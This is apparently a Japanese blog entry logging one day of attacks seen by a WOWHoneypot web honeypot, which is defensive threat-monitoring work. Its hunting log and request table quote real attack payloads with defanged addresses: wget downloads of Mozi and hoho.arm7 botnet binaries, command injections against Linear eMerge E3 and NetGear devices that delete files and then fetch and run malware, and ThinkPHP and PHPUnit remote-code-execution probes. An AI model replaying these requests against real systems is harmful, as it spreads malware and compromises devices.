23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(312日目)

2020/01/23(木)

トータルは2155件でした。

ハンティングログは以下です。

2.114.42[.]109 wget hxxp[:]//switchnets[.]net/hoho.arm7
80.21.229[.]186 wget hxxp[:]//switchnets[.]net/hoho.arm7
80.21.229[.]186 wget hxxp[:]//switchnets[.]net/hoho.arm7

www.virustotal.com
www.virustotal.com

125.137.133[.]138 wget${IFS}-qO-${IFS}hxxp[:]//205.185.115[.]72/b
www.virustotal.com

221.160.177[.]182 wget+hxxp[:]//221.160.177[.]182:4784/Mozi.m|
www.virustotal.com

件数 概要 リクエス
2045 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
64 アクセス GET /
9 調査 GET /script
3 調査 GET /is_test
3 Linear eMerge E3の脆弱性を狙った通信 GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60
3 不正中継の試み CONNECT ip.ws.126.net:443
2 Cactiの調査 GET /cacti
2 D-Linkルータの脆弱性の調査 GET /HNAP1/
1 ファイル調査 PUT /d2877987-98e5-4ddb-96b2-e7ca916aec50.txt
1 PHPUnit脆弱性(CVE-2017-9841)を狙った通信 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1 DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 POST /editBlackAndWhiteList
1 ThinkPHPの脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 NetGear製品の脆弱性を狙った通信 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+hxxp[:]//221.160.177[.]182:4784/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
1 クローリング GET /robots.txt
1 phpMyAdminの調査 GET /pma/print.css
1 phpMyAdminの調査 GET /phpmyadmin/print.css
1 phpMyAdminの調査 GET /phpMyAdmin/print.css
1 phpMyAdminの調査 GET /mysql/print.css
1 phpMyAdminの調査 GET /myadmin/print.css
1 ThinkPHPの脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 ThinkPHPの脆弱性を狙った通信 GET /index.php
1 phpMyAdminの調査 GET /database/print.css
1 ファイル調査 GET /d2877987-98e5-4ddb-96b2-e7ca916aec50.txt
1 phpMyAdminの調査 GET /admin-scripts.asp
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
1 ThinkPHPの脆弱性を狙った通信 GET /TP/public/index.php
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
1 ファイル調査 DELETE /d2877987-98e5-4ddb-96b2-e7ca916aec50.txt
1 不正中継の試み CONNECT www.google.com:443